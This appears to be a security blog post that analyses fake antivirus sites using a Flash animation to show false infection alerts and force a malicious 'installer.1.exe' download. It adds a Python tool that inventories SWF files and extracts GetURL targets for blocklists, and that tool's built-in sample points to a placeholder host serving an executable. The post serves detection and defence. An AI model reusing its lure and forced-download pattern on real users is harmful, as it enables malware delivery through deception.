We have seen many fake AV sites using images and cascading style sheets (CSS files) to display fake security messages. These pages are designed to trick users into believing that their machines are already infected and that they must download a ‘fix’. Recently, we have been seeing many “co.cc” domains hosting fake AV sites that instead use Adobe Flash to display the fake security messages. They all use the same source code and Flash files to create the animation effects of the messages. Once you visit one of these sites, you are presented with a fake error message declaring something like “Your PC is infected”, and you are then encouraged to download what turns out to be a malicious binary. Sadly, AV detection is poor, as the VirusTotal results show. Let’s take one of the live fake AV sites, “hxxp:// scanace.co.cc”, as an example. Here is what a potential victim will see at the site:
Even if the user clicks the “Cancel” button, the download of the malicious binary is still forced, and it is followed by additional fake security messages.
Here is the source code from the main page:
If you look at the source code, you will see one Flash file named “flashH264decoder.swf”, which is used for the animation, and an “installer.1.exe” binary, which is downloaded to the system. A quick Google search for this malicious Flash file reveals further domains hosting these fake AV pages. Below is the search result:
Since these sites use the “flashH264decoder.swf” Flash file for the animation, all of the images and scripts are embedded inside this single malicious file. I decompiled it to see what is inside and found 13 image files, 26 shapes, 5 buttons and 10 scripts embedded in the file. Here is a screenshot of the decompiled malicious Flash file:
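The decompiler’s inventory above (images, shapes, buttons, scripts) comes straight from the SWF tag list, and an analyst can reproduce it without a decompiler. The following is an added example written for this post, not code from the original or from any decompiler: a minimal SWF walker that handles both uncompressed (FWS) and zlib-compressed (CWS) files, skips the header RECT, counts tags by the same four groups, and pulls URL strings out of ActionGetURL records inside DoAction scripts, since that is where an AVM1 Flash file keeps the address it sends the browser to. The sample SWF it runs on is constructed in `build_sample()`; the `fake-av.example` host and its `installer.1.exe` path are placeholders, not the domains from the post.

```python
"""Minimal SWF tag enumerator for triaging a suspicious Flash file (added example)."""
import struct
import zlib

# Tag codes from the SWF specification, grouped the way a decompiler reports them.
TAG_GROUPS = {
    "images": {6, 20, 21, 35, 36, 90},   # DefineBits*, DefineBitsJPEG*, DefineBitsLossless*
    "shapes": {2, 22, 32, 83},           # DefineShape .. DefineShape4
    "buttons": {7, 34},                  # DefineButton, DefineButton2
    "scripts": {12, 59, 82},             # DoAction, DoInitAction, DoABC
}
ACTION_GET_URL = 0x83  # ActionGetURL record inside an AVM1 DoAction body


def swf_body(blob: bytes) -> bytes:
    """Return the (decompressed) content after the 8-byte header; FWS/CWS only."""
    sig, length = blob[:3], struct.unpack_from("<I", blob, 4)[0]
    if sig == b"FWS":
        body = blob[8:]
    elif sig == b"CWS":
        body = zlib.decompress(blob[8:])
    else:
        raise ValueError(f"unsupported SWF signature {sig!r}")
    if len(body) + 8 != length:
        raise ValueError("declared file length does not match content")
    return body


def rect_size(body: bytes) -> tuple:
    """Decode the header RECT; return (byte length, width, height) in twips."""
    nbits = body[0] >> 3
    nbytes = (5 + 4 * nbits + 7) // 8
    if nbits == 0:
        return nbytes, 0, 0
    bits = int.from_bytes(body[:nbytes], "big")

    def field(i):  # i-th signed nbits-wide field after the 5-bit size prefix
        shift = nbytes * 8 - 5 - (i + 1) * nbits
        v = (bits >> shift) & ((1 << nbits) - 1)
        return v - (1 << nbits) if v & (1 << (nbits - 1)) else v

    xmin, xmax, ymin, ymax = (field(i) for i in range(4))
    return nbytes, xmax - xmin, ymax - ymin


def iter_tags(body: bytes):
    """Yield (code, payload) for every tag up to the End tag."""
    pos = rect_size(body)[0] + 4  # skip FrameRate (u16) and FrameCount (u16)
    while pos + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, pos)[0]
        code, length = hdr >> 6, hdr & 0x3F
        pos += 2
        if length == 0x3F:  # long form: explicit 32-bit length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        payload = body[pos:pos + length]
        if len(payload) != length:
            raise ValueError(f"truncated tag {code} at offset {pos}")
        pos += length
        if code == 0:
            return
        yield code, payload
    raise ValueError("missing End tag")


def urls_in_actions(payload: bytes) -> list:
    """Collect the URL of every ActionGetURL record in a DoAction body."""
    urls, pos = [], 0
    while pos < len(payload):
        code = payload[pos]
        pos += 1
        if code == 0:          # ActionEnd
            break
        if code < 0x80:        # short record, no data
            continue
        length = struct.unpack_from("<H", payload, pos)[0]
        data = payload[pos + 2:pos + 2 + length]
        pos += 2 + length
        if code == ACTION_GET_URL:
            urls.append(data.split(b"\0", 1)[0].decode("latin-1"))
    return urls


def summarize(blob: bytes) -> dict:
    """Tag counts per group, stage size in pixels, and any GetURL targets."""
    body = swf_body(blob)
    _, width, height = rect_size(body)
    counts = {name: 0 for name in TAG_GROUPS}
    counts["other"] = 0
    urls = []
    for code, payload in iter_tags(body):
        group = next((n for n, s in TAG_GROUPS.items() if code in s), "other")
        counts[group] += 1
        if code == 12:
            urls.extend(urls_in_actions(payload))
    return {"width_px": width // 20, "height_px": height // 20, "tags": counts, "urls": urls}


def _tag(code: int, payload: bytes) -> bytes:
    if len(payload) >= 0x3F:
        return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload
    return struct.pack("<H", (code << 6) | len(payload)) + payload


def _rect(xmax: int, ymax: int, nbits: int = 15) -> bytes:
    bits = f"{nbits:05b}" + "".join(f"{v:0{nbits}b}" for v in (0, xmax, 0, ymax))
    bits += "0" * (-len(bits) % 8)
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def build_sample(compressed: bool) -> bytes:
    """Constructed stand-in for a fake-AV SWF (placeholder host, not a real sample)."""
    get_url = b"http://fake-av.example/installer.1.exe\0" + b"\0"  # URL + empty target
    actions = bytes([ACTION_GET_URL]) + struct.pack("<H", len(get_url)) + get_url + b"\0"
    tags = (
        _tag(69, b"\0\0\0\0")                        # FileAttributes
        + _tag(9, b"\xff\xff\xff")                   # SetBackgroundColor
        + _tag(21, b"\x01\x00\xff\xd8" + b"\0" * 66)  # DefineBitsJPEG2 (long header)
        + _tag(20, b"\x02\x00" + b"\0" * 10)         # DefineBitsLossless
        + _tag(2, b"\x03\x00" + b"\0" * 20)          # DefineShape
        + _tag(22, b"\x04\x00" + b"\0" * 20)         # DefineShape2
        + _tag(34, b"\x05\x00" + b"\0" * 8)          # DefineButton2
        + _tag(12, actions)                          # DoAction with GetURL
        + _tag(1, b"") + _tag(0, b"")                # ShowFrame, End
    )
    body = _rect(11000, 8000) + struct.pack("<HH", 0x1800, 1) + tags  # 550x400 px, 24 fps
    header = bytes([8]) + struct.pack("<I", len(body) + 8)             # version 8, file length
    return b"CWS" + header + zlib.compress(body) if compressed else b"FWS" + header + body


if __name__ == "__main__":
    print(summarize(build_sample(compressed=True)))
```

On a real file, `summarize(open("flashH264decoder.swf", "rb").read())` gives the same style of inventory the screenshot shows; the `urls` list is the part worth feeding to blocklists, since a GetURL that points at an executable is what turns an animation into a download. DefineSprite (tag 39) nests its own tag list and DoABC (ActionScript 3) bytecode is not decoded here, so counts for files that use either are a lower bound.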
These domains are now blocked by Google Safe Browsing, which is leveraged by both the Firefox and Chrome browsers. Why did the attackers choose Flash instead of the images and CSS files that we traditionally see? While this approach requires a third-party browser add-on, Flash is essentially ubiquitous across browsers, and perhaps the attackers felt that it allowed them to produce a more convincing social engineering attack. Stay safe.
Umesh